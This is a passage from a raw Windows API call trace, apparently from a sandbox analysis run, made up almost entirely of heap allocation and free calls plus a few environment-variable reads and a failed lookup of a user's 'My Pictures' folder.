dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0264.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0264.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0264.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0264.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0264.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0264.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0264.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0264.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0264.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.660] CloseHandle (hObject=0x2cc) returned 1 [0264.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0264.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0264.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0264.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0264.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0264.661] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0264.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0264.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0264.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0264.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0264.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0264.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0264.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0264.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0264.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0264.666] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0264.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0264.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0264.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0264.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0264.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0264.667] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0264.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0264.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0264.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0264.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0264.667] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0264.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0264.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0264.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0264.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0264.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0264.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0264.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0264.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0264.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0264.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0264.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0264.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x68) returned 0x24202f0 [0264.669] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/My Pictures", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures", lpFilePart=0x8bedfc*="My Pictures") returned 0x33 [0264.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0264.669] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my pictures")) returned 0x2416 [0264.670] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x25c0000, ftCreationTime.dwLowDateTime=0x4a82e4, ftCreationTime.dwHighDateTime=0x1580012, ftLastAccessTime.dwLowDateTime=0x1d4a, ftLastAccessTime.dwHighDateTime=0x13a0021, ftLastWriteTime.dwLowDateTime=0x20054, ftLastWriteTime.dwHighDateTime=0x4a8178, nFileSizeHigh=0x74f605ba, nFileSizeLow=0x25c6d68, dwReserved0=0x1d4a, dwReserved1=0x4, cFileName="", cAlternateFileName="")) returned 0xffffffff [0264.670] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0264.670] GetLastError () returned 0x6 [0264.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0264.670] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0264.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0264.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0264.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0264.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0264.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0264.671] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0264.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0264.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0264.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0264.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0264.671] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0264.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0264.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0264.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0264.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0264.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0264.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 